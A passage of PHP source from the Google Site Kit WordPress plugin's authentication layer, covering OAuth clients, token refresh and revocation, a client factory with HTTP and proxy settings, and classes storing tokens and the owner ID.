self::OPTION_ERROR_REDIRECT_URL ); $this->user_options->delete( self::OPTION_ADDITIONAL_AUTH_SCOPES ); } /** * Return the URL for the user to view the dashboard/splash * page based on their permissions. * * @since 1.77.0 */ private function get_authorize_user_redirect_url_for_error() { $error_redirect_url = $this->user_options->get( self::OPTION_ERROR_REDIRECT_URL ); if ( $error_redirect_url ) { $this->user_options->delete( self::OPTION_ERROR_REDIRECT_URL ); return $error_redirect_url; } return current_user_can( Permissions::VIEW_DASHBOARD ) ? $this->context->admin_url( 'dashboard' ) : $this->context->admin_url( 'splash' ); } /** * Return the URL to redirect the user to after authorization, including important query params. * * @since 1.170.0 */ private function get_authorize_user_redirect_url() { $redirect_url = $this->user_options->get( self::OPTION_REDIRECT_URL ); if ( $redirect_url ) { $url_query = URL::parse( $redirect_url, PHP_URL_QUERY ); if ( $url_query ) { parse_str( $url_query, $query_args ); } $reauth = isset( $query_args['reAuth'] ) && 'true' === $query_args['reAuth']; if ( false === $reauth && empty( $query_args['notification'] ) ) { $redirect_url = add_query_arg( array( 'notification' => 'authentication_success' ), $redirect_url ); } if ( $this->context->input()->filter( INPUT_GET, 'searchConsoleSetupSuccess' ) ) { $redirect_url = add_query_arg( array( 'searchConsoleSetupSuccess' => 'true' ), $redirect_url ); } $this->user_options->delete( self::OPTION_REDIRECT_URL ); $this->user_options->delete( self::OPTION_ERROR_REDIRECT_URL ); } else { // No redirect_url is set, use default page. $redirect_url = $this->context->admin_url( 'splash', array( 'notification' => 'authentication_success' ) ); } return $redirect_url; } } <?php /** * Class Google\Site_Kit\Core\Authentication\Clients\Google_Site_Kit_Proxy_Client * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication\Clients; use Google\Site_Kit\Core\Authentication\Google_Proxy; use Google\Site_Kit\Core\Authentication\Clients\OAuth2; use Google\Site_Kit\Core\Authentication\Exception\Google_Proxy_Code_Exception; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils; use Exception; /** * Modified Google Site Kit API client relying on the authentication proxy. * * @since 1.0.0 * @since 1.2.0 Renamed to Google_Site_Kit_Proxy_Client. * @access private * @ignore */ class Google_Site_Kit_Proxy_Client extends Google_Site_Kit_Client { /** * Base URL to the proxy. * * @since 1.1.2 * @var string */ protected $proxy_base_path = Google_Proxy::PRODUCTION_BASE_URL; /** * Construct the Google client. * * @since 1.1.2 * * @param array $config Proxy client configuration. */ public function __construct( array $config = array() ) { if ( ! empty( $config['proxy_base_path'] ) ) { $this->setProxyBasePath( $config['proxy_base_path'] ); } unset( $config['proxy_base_path'] ); parent::__construct( $config ); $this->setApplicationName( Google_Proxy::get_application_name() ); } /** * Sets the base URL to the proxy. * * @since 1.2.0 * * @param string $base_path Proxy base URL. */ public function setProxyBasePath( $base_path ) { $this->proxy_base_path = untrailingslashit( $base_path ); } /** * Revokes an OAuth2 access token using the authentication proxy. * * @since 1.0.0 * * @param string|array|null $token Optional. Access token. Default is the current one. * @return bool True on success, false on failure. */ public function revokeToken( $token = null ) { if ( ! $token ) { $token = $this->getAccessToken(); } if ( is_array( $token ) ) { $token = $token['access_token']; } $body = Utils::streamFor( http_build_query( array( 'client_id' => $this->getClientId(), 'token' => $token, ) ) ); $request = new Request( 'POST', $this->proxy_base_path . Google_Proxy::OAUTH2_REVOKE_URI, array( 'Cache-Control' => 'no-store', 'Content-Type' => 'application/x-www-form-urlencoded', ), $body ); $http_handler = HttpHandlerFactory::build( $this->getHttpClient() ); $response = $http_handler( $request ); return 200 === (int) $response->getStatusCode(); } /** * Creates a Google auth object for the authentication proxy. * * @since 1.0.0 */ protected function createOAuth2Service() { return new OAuth2( array( 'clientId' => $this->getClientId(), 'clientSecret' => $this->getClientSecret(), 'authorizationUri' => $this->proxy_base_path . Google_Proxy::OAUTH2_AUTH_URI, 'tokenCredentialUri' => $this->proxy_base_path . Google_Proxy::OAUTH2_TOKEN_URI, 'redirectUri' => $this->getRedirectUri(), 'issuer' => $this->getClientId(), 'signingKey' => null, 'signingAlgorithm' => null, ) ); } /** * Handles an erroneous response from a request to fetch an auth token. * * @since 1.2.0 * * @param string $error Error code / error message. * @param array $data Associative array of full response data. * * @throws Google_Proxy_Code_Exception Thrown when proxy returns an error accompanied by a temporary access code. */ protected function handleAuthTokenErrorResponse( $error, array $data ) { if ( ! empty( $data['code'] ) ) { throw new Google_Proxy_Code_Exception( $error, 0, $data['code'] ); } parent::handleAuthTokenErrorResponse( $error, $data ); } } <?php /** * Class Google\Site_Kit\Core\Authentication\Clients\Google_Site_Kit_Client * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication\Clients; use Google\Site_Kit\Core\Authentication\Clients\OAuth2; use Google\Site_Kit\Core\Authentication\Exception\Google_OAuth_Exception; use Google\Site_Kit_Dependencies\Google_Client; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache; use Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit\Core\Util\URL; use Exception; use InvalidArgumentException; use LogicException; use WP_User; /** * Extended Google API client with custom functionality for Site Kit. * * @since 1.2.0 * @access private * @ignore */ class Google_Site_Kit_Client extends Google_Client { /** * Callback to pass a potential exception to while refreshing an access token. * * @since 1.2.0 * @var callable|null */ protected $token_exception_callback; /** * Construct the Google client. * * @since 1.2.0 * * @param array $config Client configuration. */ public function __construct( array $config = array() ) { if ( isset( $config['token_exception_callback'] ) ) { $this->setTokenExceptionCallback( $config['token_exception_callback'] ); } unset( $config['token_exception_callback'] ); parent::__construct( $config ); } /** * Sets the function to be called when fetching an access token results in an exception. * * @since 1.2.0 * * @param callable $exception_callback Function accepting an exception as single parameter. */ public function setTokenExceptionCallback( callable $exception_callback ) { $this->token_exception_callback = $exception_callback; } /** * Sets whether or not to return raw requests and returns a callback to reset to the previous value. * * @since 1.2.0 * * @param bool $defer Whether or not to return raw requests. * @return callable Callback function that resets to the original $defer value. */ public function withDefer( $defer ) { $orig_defer = $this->shouldDefer(); $this->setDefer( $defer ); // Return a function to restore the original refer value. return function () use ( $orig_defer ) { $this->setDefer( $orig_defer ); }; } /** * Adds auth listeners to the HTTP client based on the credentials set in the Google API Client object. * * @since 1.2.0 * * @param ClientInterface $http The HTTP client object. * @return ClientInterface The HTTP client object. * * @throws Exception Thrown when fetching a new access token via refresh token on-the-fly fails. */ public function authorize( ?ClientInterface $http = null ) { if ( $this->isUsingApplicationDefaultCredentials() ) { return parent::authorize( $http ); } $token = $this->getAccessToken(); if ( isset( $token['refresh_token'] ) && $this->isAccessTokenExpired() ) { $callback = $this->getConfig( 'token_callback' ); try { $token_response = $this->fetchAccessTokenWithRefreshToken( $token['refresh_token'] ); if ( $callback ) { // Due to original callback signature this can only accept the token itself. call_user_func( $callback, '', $token_response['access_token'] ); } } catch ( Exception $e ) { // Pass exception to special callback if provided. if ( $this->token_exception_callback ) { call_user_func( $this->token_exception_callback, $e ); } throw $e; } } return parent::authorize( $http ); } /** * Fetches an OAuth 2.0 access token by using a temporary code. * * @since 1.0.0 * @since 1.2.0 Ported from Google_Site_Kit_Proxy_Client. * @since 1.149.0 Added $code_verifier param for client v2.15.0 compatibility. (@link https://github.com/googleapis/google-api-php-client/commit/bded223ece445a6130cde82417b20180b1d6698a) * * @param string $code Temporary authorization code, or undelegated token code. * @param string $code_verifier The code verifier used for PKCE (if applicable). * * @return array Access token. * * @throws InvalidArgumentException Thrown when the passed code is empty. */ public function fetchAccessTokenWithAuthCode( $code, $code_verifier = null ) { if ( strlen( $code ) === 0 ) { throw new InvalidArgumentException( 'Invalid code' ); } $auth = $this->getOAuth2Service(); $auth->setCode( $code ); $auth->setRedirectUri( $this->getRedirectUri() ); if ( $code_verifier ) { $auth->setCodeVerifier( $code_verifier ); } $http_handler = HttpHandlerFactory::build( $this->getHttpClient() ); $token_response = $this->fetchAuthToken( $auth, $http_handler ); if ( $token_response && isset( $token_response['access_token'] ) ) { $token_response['created'] = time(); $this->setAccessToken( $token_response ); } return $token_response; } /** * Fetches a fresh OAuth 2.0 access token by using a refresh token. * * @since 1.0.0 * @since 1.2.0 Ported from Google_Site_Kit_Proxy_Client. * * @param string $refresh_token Optional. Refresh token. Unused here. * @param array $extra_params Optional. Array of extra parameters to fetch with. * @return array Access token. * * @throws LogicException Thrown when no refresh token is available. */ public function fetchAccessTokenWithRefreshToken( $refresh_token = null, $extra_params = array() ) { if ( null === $refresh_token ) { $refresh_token = $this->getRefreshToken(); if ( ! $refresh_token ) { throw new LogicException( 'refresh token must be passed in or set as part of setAccessToken' ); } } $this->getLogger()->info( 'OAuth2 access token refresh' ); $auth = $this->getOAuth2Service(); $auth->setRefreshToken( $refresh_token ); $http_handler = HttpHandlerFactory::build( $this->getHttpClient() ); $token_response = $this->fetchAuthToken( $auth, $http_handler, $extra_params ); if ( $token_response && isset( $token_response['access_token'] ) ) { $token_response['created'] = time(); if ( ! isset( $token_response['refresh_token'] ) ) { $token_response['refresh_token'] = $refresh_token; } $this->setAccessToken( $token_response ); /** * Fires when the current user has just been reauthorized to access Google APIs with a refreshed access token. * * In other words, this action fires whenever Site Kit has just obtained a new access token based on * the refresh token for the current user, which typically happens once every hour when using Site Kit, * since that is the lifetime of every access token. * * @since 1.25.0 * * @param array $token_response Token response data. */ do_action( 'googlesitekit_reauthorize_user', $token_response ); } return $token_response; } /** * Executes deferred HTTP requests. * * @since 1.38.0 * * @param RequestInterface $request Request object to execute. * @param string $expected_class Expected class to return. * @return object An object of the type of the expected class or Psr\Http\Message\ResponseInterface. */ public function execute( RequestInterface $request, $expected_class = null ) { $request = $request->withHeader( 'X-Goog-Quota-User', self::getQuotaUser() ); return parent::execute( $request, $expected_class ); } /** * Returns a string that uniquely identifies a user of the application. * * @since 1.38.0 * * @return string Unique user identifier. */ public static function getQuotaUser() { $user_id = get_current_user_id(); $url = get_home_url(); $scheme = URL::parse( $url, PHP_URL_SCHEME ); $host = URL::parse( $url, PHP_URL_HOST ); $path = URL::parse( $url, PHP_URL_PATH ); return "{$scheme}://{$user_id}@{$host}{$path}"; } /** * Fetches an OAuth 2.0 access token using a given auth object and HTTP handler. * * This method is used in place of {@see OAuth2::fetchAuthToken()}. * * @since 1.0.0 * @since 1.2.0 Ported from Google_Site_Kit_Proxy_Client. * * @param OAuth2 $auth OAuth2 instance. * @param callable|null $http_handler Optional. HTTP handler callback. Default null. * @param array $extra_params Optional. Array of extra parameters to fetch with. * @return array Access token. */ protected function fetchAuthToken( OAuth2 $auth, ?callable $http_handler = null, $extra_params = array() ) { if ( is_null( $http_handler ) ) { $http_handler = HttpHandlerFactory::build( HttpClientCache::getHttpClient() ); } $request = $auth->generateCredentialsRequest( $extra_params ); $response = $http_handler( $request ); $credentials = $auth->parseTokenResponse( $response ); if ( ! empty( $credentials['error'] ) ) { $this->handleAuthTokenErrorResponse( $credentials['error'], $credentials ); } $auth->updateToken( $credentials ); return $credentials; } /** * Handles an erroneous response from a request to fetch an auth token. * * @since 1.2.0 * * @param string $error Error code / error message. * @param array $data Associative array of full response data. * * @throws Google_OAuth_Exception Thrown with the given $error as message. */ protected function handleAuthTokenErrorResponse( $error, array $data ) { throw new Google_OAuth_Exception( $error ); } /** * Create a default Google OAuth2 object. * * @return OAuth2 Created OAuth2 instance. */ protected function createOAuth2Service() { $auth = new OAuth2( array( 'clientId' => $this->getClientId(), 'clientSecret' => $this->getClientSecret(), 'authorizationUri' => self::OAUTH2_AUTH_URL, 'tokenCredentialUri' => self::OAUTH2_TOKEN_URI, 'redirectUri' => $this->getRedirectUri(), 'issuer' => $this->getConfig( 'client_id' ), 'signingKey' => $this->getConfig( 'signing_key' ), 'signingAlgorithm' => $this->getConfig( 'signing_algorithm' ), ) ); return $auth; } } <?php /** * Class Google\Site_Kit\Core\Authentication\Clients\OAuth_Client_Base * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication\Clients; use Exception; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Authentication\Credentials; use Google\Site_Kit\Core\Authentication\Exception\Google_Proxy_Code_Exception; use Google\Site_Kit\Core\Authentication\Google_Proxy; use Google\Site_Kit\Core\Authentication\Profile; use Google\Site_Kit\Core\Authentication\Token; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\Storage\Encrypted_Options; use Google\Site_Kit\Core\Storage\Options; use Google\Site_Kit\Core\Storage\User_Options; /** * Base class for connecting to Google APIs via OAuth. * * @since 1.39.0 * @access private * @ignore */ abstract class OAuth_Client_Base { const OPTION_ACCESS_TOKEN = 'googlesitekit_access_token'; const OPTION_ACCESS_TOKEN_EXPIRES_IN = 'googlesitekit_access_token_expires_in'; const OPTION_ACCESS_TOKEN_CREATED = 'googlesitekit_access_token_created_at'; const OPTION_REFRESH_TOKEN = 'googlesitekit_refresh_token'; const OPTION_AUTH_SCOPES = 'googlesitekit_auth_scopes'; const OPTION_ERROR_CODE = 'googlesitekit_error_code'; const OPTION_PROXY_ACCESS_CODE = 'googlesitekit_proxy_access_code'; /** * Plugin context. * * @since 1.39.0 * @var Context */ protected $context; /** * Options instance * * @since 1.39.0 * @var Options */ protected $options; /** * User_Options instance * * @since 1.39.0 * @var User_Options */ protected $user_options; /** * OAuth credentials instance. * * @since 1.39.0 * @var Credentials */ protected $credentials; /** * Google_Proxy instance. * * @since 1.39.0 * @var Google_Proxy */ protected $google_proxy; /** * Google Client object. * * @since 1.39.0 * @var Google_Site_Kit_Client */ protected $google_client; /** * Profile instance. * * @since 1.39.0 * @var Profile */ protected $profile; /** * Token instance. * * @since 1.39.0 * @var Token */ protected $token; /** * Constructor. * * @since 1.39.0 * * @param Context $context Plugin context. * @param Options $options Optional. Option API instance. Default is a new instance. * @param User_Options $user_options Optional. User Option API instance. Default is a new instance. * @param Credentials $credentials Optional. Credentials instance. Default is a new instance from $options. * @param Google_Proxy $google_proxy Optional. Google proxy instance. Default is a new instance. * @param Profile $profile Optional. Profile instance. Default is a new instance. * @param Token $token Optional. Token instance. Default is a new instance. */ public function __construct( Context $context, ?Options $options = null, ?User_Options $user_options = null, ?Credentials $credentials = null, ?Google_Proxy $google_proxy = null, ?Profile $profile = null, ?Token $token = null ) { $this->context = $context; $this->options = $options ?: new Options( $this->context ); $this->user_options = $user_options ?: new User_Options( $this->context ); $this->credentials = $credentials ?: new Credentials( new Encrypted_Options( $this->options ) ); $this->google_proxy = $google_proxy ?: new Google_Proxy( $this->context ); $this->profile = $profile ?: new Profile( $this->user_options ); $this->token = $token ?: new Token( $this->user_options ); } /** * Gets the Google client object. * * @since 1.39.0 * @since 1.2.0 Now always returns a Google_Site_Kit_Client. * * @return Google_Site_Kit_Client Google client object. */ public function get_client() { if ( ! $this->google_client instanceof Google_Site_Kit_Client ) { $credentials = $this->credentials->get(); $this->google_client = Client_Factory::create_client( array( 'client_id' => $credentials['oauth2_client_id'], 'client_secret' => $credentials['oauth2_client_secret'], 'redirect_uri' => $this->get_redirect_uri(), 'token' => $this->get_token(), 'token_callback' => array( $this, 'set_token' ), 'token_exception_callback' => function ( Exception $e ) { $this->handle_fetch_token_exception( $e ); }, 'required_scopes' => $this->get_required_scopes(), 'login_hint_email' => $this->profile->has() ? $this->profile->get()['email'] : '', 'using_proxy' => $this->credentials->using_proxy(), 'proxy_url' => $this->google_proxy->url(), ) ); } return $this->google_client; } /** * Gets the list of currently required Google OAuth scopes. * * @since 1.39.0 * @see https://developers.google.com/identity/protocols/googlescopes * * @return array List of Google OAuth scopes. */ public function get_required_scopes() { /** * Filters the list of required Google OAuth scopes. * * See all Google oauth scopes here: https://developers.google.com/identity/protocols/googlescopes * * @since 1.39.0 * * @param array $scopes List of scopes. */ $scopes = (array) apply_filters( 'googlesitekit_auth_scopes', array() ); return array_unique( array_merge( // Default scopes that are always required. array( 'openid', 'https://www.googleapis.com/auth/userinfo.profile', 'https://www.googleapis.com/auth/userinfo.email', ), $scopes ) ); } /** * Gets the list of currently granted Google OAuth scopes for the current user. * * @since 1.39.0 * @see https://developers.google.com/identity/protocols/googlescopes * * @return string[] List of Google OAuth scopes. */ public function get_granted_scopes() { return $this->user_options->get( self::OPTION_AUTH_SCOPES ) ?: array(); } /** * Sets the list of currently granted Google OAuth scopes for the current user. * * @since 1.39.0 * @see https://developers.google.com/identity/protocols/googlescopes * * @param string[] $scopes List of Google OAuth scopes. */ public function set_granted_scopes( $scopes ) { $required_scopes = $this->get_required_scopes(); $scopes = array_values( array_unique( array_intersect( $scopes, $required_scopes ) ) ); $this->user_options->set( self::OPTION_AUTH_SCOPES, $scopes ); } /** * Gets the current user's full OAuth token data, including access token and optional refresh token. * * @since 1.39.0 * * @return array Associative array with 'access_token', 'expires_in', 'created', and 'refresh_token' keys, or empty * array if no token available. */ public function get_token() { return $this->token->get(); } /** * Sets the current user's full OAuth token data, including access token and optional refresh token. * * @since 1.39.0 * * @param array $token { * Full token data, optionally including the refresh token. * * @type string $access_token Required. The access token. * @type int $expires_in Number of seconds in which the token expires. Default 3600 (1 hour). * @type int $created Timestamp in seconds when the token was created. Default is the current time. * @type string $refresh_token The refresh token, if relevant. If passed, it is set as well. * } * @return bool True on success, false on failure. */ public function set_token( array $token ) { // Remove the error code from the user options so it doesn't // appear again. $this->user_options->delete( OAuth_Client::OPTION_ERROR_CODE ); return $this->token->set( $token ); } /** * Deletes the current user's token and all associated data. * * @since 1.0.3 */ protected function delete_token() { $this->token->delete(); $this->user_options->delete( self::OPTION_AUTH_SCOPES ); } /** * Converts the given error code to a user-facing message. * * @since 1.39.0 * * @param string $error_code Error code. * @return string Error message. */ public function get_error_message( $error_code ) { switch ( $error_code ) { case 'access_denied': return __( 'Setup was interrupted because you did not grant the necessary permissions.', 'google-site-kit' ); case 'access_token_not_received': return __( 'Unable to receive access token because of an unknown error.', 'google-site-kit' ); case 'cannot_log_in': return __( 'Internal error that the Google login redirect failed.', 'google-site-kit' ); case 'invalid_client': return __( 'Unable to receive access token because of an invalid client.', 'google-site-kit' ); case 'invalid_code': return __( 'Unable to receive access token because of an empty authorization code.', 'google-site-kit' ); case 'invalid_grant': return __( 'Unable to receive access token because of an invalid authorization code or refresh token.', 'google-site-kit' ); case 'invalid_request': return __( 'Unable to receive access token because of an invalid OAuth request.', 'google-site-kit' ); case 'missing_delegation_consent': return __( 'Looks like your site is not allowed access to Google account data and can’t display stats in the dashboard.', 'google-site-kit' ); case 'missing_search_console_property': return __( 'Looks like there is no Search Console property for your site.', 'google-site-kit' ); case 'missing_verification': return __( 'Looks like the verification token for your site is missing.', 'google-site-kit' ); case 'oauth_credentials_not_exist': return __( 'Unable to authenticate Site Kit, as no client credentials exist.', 'google-site-kit' ); case 'refresh_token_not_exist': return __( 'Unable to refresh access token, as no refresh token exists.', 'google-site-kit' ); case 'unauthorized_client': return __( 'Unable to receive access token because of an unauthorized client.', 'google-site-kit' ); case 'unsupported_grant_type': return __( 'Unable to receive access token because of an unsupported grant type.', 'google-site-kit' ); default: /* translators: %s: error code from API */ return sprintf( __( 'Unknown Error (code: %s).', 'google-site-kit' ), $error_code ); } } /** * Handles an exception thrown when fetching an access token. * * @since 1.2.0 * * @param Exception $e Exception thrown. */ protected function handle_fetch_token_exception( Exception $e ) { $error_code = $e->getMessage(); // Revoke and delete user connection data on 'invalid_grant'. // This typically happens during refresh if the refresh token is invalid or expired. if ( 'invalid_grant' === $error_code ) { $this->delete_token(); } $this->user_options->set( self::OPTION_ERROR_CODE, $error_code ); if ( $e instanceof Google_Proxy_Code_Exception ) { $this->user_options->set( self::OPTION_PROXY_ACCESS_CODE, $e->getAccessCode() ); } } /** * Gets the OAuth redirect URI that listens to the callback request. * * @since 1.39.0 * * @return string OAuth redirect URI. */ protected function get_redirect_uri() { return add_query_arg( 'oauth2callback', '1', admin_url( 'index.php' ) ); } } <?php /** * Class Google\Site_Kit\Core\Authentication\Clients\OAuth2 * * @package Google\Site_Kit * @copyright 2022 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication\Clients; use Google\Site_Kit_Dependencies\Google\Auth\OAuth2 as Google_Service_OAuth2; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Query; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; /** * Class for connecting to Google APIs via OAuth2. * * @since 1.87.0 * @access private * @ignore */ class OAuth2 extends Google_Service_OAuth2 { /** * Overrides generateCredentialsRequest with additional parameters. * * @since 1.87.0 * * @param array $extra_params Optional. Array of extra parameters to fetch with. * @return RequestInterface Token credentials request. */ public function generateCredentialsRequest( $extra_params = array() ) { $request = parent::generateCredentialsRequest(); $grant_type = $this->getGrantType(); if ( empty( $extra_params ) || 'refresh_token' !== $grant_type ) { return $request; } $params = array( 'body' => Query::build( array_merge( Query::parse( Utils::copyToString( $request->getBody() ) ), $extra_params ) ), ); return Utils::modifyRequest( $request, $params ); } } <?php /** * Class Google\Site_Kit\Core\Authentication\Clients\Client_Factory * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication\Clients; use Exception; use Google\Site_Kit\Core\Authentication\Google_Proxy; use Google\Site_Kit\Core\HTTP\Middleware; use Google\Site_Kit_Dependencies\GuzzleHttp\Client; use WP_HTTP_Proxy; /** * Class for creating Site Kit-specific Google_Client instances. * * @since 1.39.0 * @access private * @ignore */ final class Client_Factory { /** * Creates a new Google client instance for the given arguments. * * @since 1.39.0 * * @param array $args Associative array of arguments. * @return Google_Site_Kit_Client|Google_Site_Kit_Proxy_Client The created Google client instance. */ public static function create_client( array $args ) { $args = array_merge( array( 'client_id' => '', 'client_secret' => '', 'redirect_uri' => '', 'token' => array(), 'token_callback' => null, 'token_exception_callback' => null, 'required_scopes' => array(), 'login_hint_email' => '', 'using_proxy' => true, 'proxy_url' => Google_Proxy::PRODUCTION_BASE_URL, ), $args ); if ( $args['using_proxy'] ) { $client = new Google_Site_Kit_Proxy_Client( array( 'proxy_base_path' => $args['proxy_url'] ) ); } else { $client = new Google_Site_Kit_Client(); } // Enable exponential retries, try up to three times. $client->setConfig( 'retry', array( 'retries' => 3 ) ); $http_client = $client->getHttpClient(); $http_client_config = self::get_http_client_config( $http_client->getConfig() ); // In Guzzle 6+, the HTTP client is immutable, so only a new instance can be set. $client->setHttpClient( new Client( $http_client_config ) ); $auth_config = self::get_auth_config( $args['client_id'], $args['client_secret'], $args['redirect_uri'] ); if ( ! empty( $auth_config ) ) { try { $client->setAuthConfig( $auth_config ); } catch ( Exception $e ) { return $client; } } // Offline access so we can access the refresh token even when the user is logged out. $client->setAccessType( 'offline' ); $client->setPrompt( 'consent' ); $client->setRedirectUri( $args['redirect_uri'] ); $client->setScopes( (array) $args['required_scopes'] ); // Set the full token data. if ( ! empty( $args['token'] ) ) { $client->setAccessToken( $args['token'] ); } // Set the callback which is called when the client refreshes the access token on-the-fly. $token_callback = $args['token_callback']; if ( $token_callback ) { $client->setTokenCallback( function ( $cache_key, $access_token ) use ( $client, $token_callback ) { // The same token from this callback should also already be set in the client object, which is useful // to get the full token data, all of which needs to be saved. Just in case, if that is not the same, // we save the passed token only, relying on defaults for the other values. $token = $client->getAccessToken(); if ( $access_token !== $token['access_token'] ) { $token = array( 'access_token' => $access_token ); } $token_callback( $token ); } ); } // Set the callback which is called when refreshing the access token on-the-fly fails. $token_exception_callback = $args['token_exception_callback']; if ( ! empty( $token_exception_callback ) ) { $client->setTokenExceptionCallback( $token_exception_callback ); } if ( ! empty( $args['login_hint_email'] ) ) { $client->setLoginHint( $args['login_hint_email'] ); } return $client; } /** * Get HTTP client configuration. * * @since 1.115.0 * * @param array $config Initial configuration. * @return array The new HTTP client configuration. */ private static function get_http_client_config( $config ) { // Override the default user-agent for the Guzzle client. This is used for oauth/token requests. // By default this header uses the generic Guzzle client's user-agent and includes // Guzzle, cURL, and PHP versions as it is normally shared. // In our case however, the client is namespaced to be used by Site Kit only. $config['headers']['User-Agent'] = Google_Proxy::get_application_name(); /** This filter is documented in wp-includes/class-http.php */ $ssl_verify = apply_filters( 'https_ssl_verify', true, null ); // If SSL verification is enabled (default) use the SSL certificate bundle included with WP. if ( $ssl_verify ) { $config['verify'] = ABSPATH . WPINC . '/certificates/ca-bundle.crt'; } else { $config['verify'] = false; } // Configure the Google_Client's HTTP client to use the same HTTP proxy as WordPress HTTP, if set. $http_proxy = new WP_HTTP_Proxy(); if ( $http_proxy->is_enabled() ) { // See https://docs.guzzlephp.org/en/6.5/request-options.html#proxy for reference. $auth = $http_proxy->use_authentication() ? "{$http_proxy->authentication()}@" : ''; $config['proxy'] = "{$auth}{$http_proxy->host()}:{$http_proxy->port()}"; } // Respect WordPress HTTP request blocking settings. $config['handler']->push( Middleware::block_external_request() ); /** * Filters the IP version to force hostname resolution with. * * @since 1.115.0 * * @param $force_ip_resolve null|string IP version to force. Default: null. */ $force_ip_resolve = apply_filters( 'googlesitekit_force_ip_resolve', null ); if ( in_array( $force_ip_resolve, array( null, 'v4', 'v6' ), true ) ) { $config['force_ip_resolve'] = $force_ip_resolve; } return $config; } /** * Returns the full OAuth credentials configuration data based on the given client ID and secret. * * @since 1.39.0 * * @param string $client_id OAuth client ID. * @param string $client_secret OAuth client secret. * @param string $redirect_uri OAuth redirect URI. * @return array Credentials data, or empty array if any of the given values is empty. */ private static function get_auth_config( $client_id, $client_secret, $redirect_uri ) { if ( ! $client_id || ! $client_secret || ! $redirect_uri ) { return array(); } return array( 'client_id' => $client_id, 'client_secret' => $client_secret, 'auth_uri' => 'https://accounts.google.com/o/oauth2/v2/auth', 'token_uri' => 'https://oauth2.googleapis.com/token', 'auth_provider_x509_cert_url' => 'https://www.googleapis.com/oauth2/v1/certs', 'redirect_uris' => array( $redirect_uri ), ); } } <?php /** * Class Google\Site_Kit\Core\Authentication\Verification_File * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication; use Google\Site_Kit\Core\Storage\User_Setting; /** * Class representing the site verification file token for a user. * * @since 1.1.0 * @access private * @ignore */ final class Verification_File extends User_Setting { /** * User option key. */ const OPTION = 'googlesitekit_site_verification_file'; } <?php /** * Class Google\Site_Kit\Core\Authentication\Owner_ID * * @package Google\Site_Kit\Core\Authentication * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication; use Google\Site_Kit\Core\Storage\Setting; /** * Owner_ID class. * * @since 1.16.0 * @access private * @ignore */ class Owner_ID extends Setting { /** * The option_name for this setting. */ const OPTION = 'googlesitekit_owner_id'; /** * Gets the value of the setting. * * @since 1.16.0 * * @return mixed Value set for the option, or registered default if not set. */ public function get() { return (int) parent::get(); } /** * Gets the expected value type. * * @since 1.16.0 * * @return string The type name. */ protected function get_type() { return 'integer'; } /** * Gets the default value. * * We use the old "googlesitekit_first_admin" option here as it used to store the ID * of the first admin user to use the plugin. If this option doesn't exist, it will return 0. * * @since 1.16.0 * * @return int The default value. */ protected function get_default() { return (int) $this->options->get( 'googlesitekit_first_admin' ); } /** * Gets the callback for sanitizing the setting's value before saving. * * @since 1.16.0 * * @return callable The callable sanitize callback. */ protected function get_sanitize_callback() { return 'intval'; } } <?php /** * Class Google\Site_Kit\Core\Authentication\Token * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication; use Google\Site_Kit\Core\Storage\User_Options; use Google\Site_Kit\Core\Storage\Encrypted_User_Options; use Google\Site_Kit\Core\Authentication\Clients\OAuth_Client; /** * Class representing the OAuth token for a user. * * This includes the access token, its creation and expiration data, and the refresh token. * This class is compatible with `Google\Site_Kit\Core\Storage\User_Setting`, as it should in the future be adjusted * so that the four pieces of data become a single user setting. * * @since 1.39.0 * @access private * @ignore */ final class Token { /** * User_Options instance. * * @since 1.39.0 * @var User_Options */ protected $user_options; /** * Encrypted_User_Options instance. * * @since 1.39.0 * @var Encrypted_User_Options */ private $encrypted_user_options; /** * Constructor. * * @since 1.39.0 * * @param User_Options $user_options User_Options instance. */ public function __construct( User_Options $user_options ) { $this->user_options = $user_options; $this->encrypted_user_options = new Encrypted_User_Options( $this->user_options ); } /** * Checks whether or not the setting exists. * * @since 1.39.0 * * @return bool True on success, false on failure. */ public function has() { if ( ! $this->get() ) { return false; } return true; } /** * Gets the value of the setting. * * @since 1.39.0 * * @return mixed Value set for the option, or default if not set. */ public function get() { $access_token = $this->encrypted_user_options->get( OAuth_Client::OPTION_ACCESS_TOKEN ); if ( empty( $access_token ) ) { return array(); } $token = array( 'access_token' => $access_token, 'expires_in' => (int) $this->user_options->get( 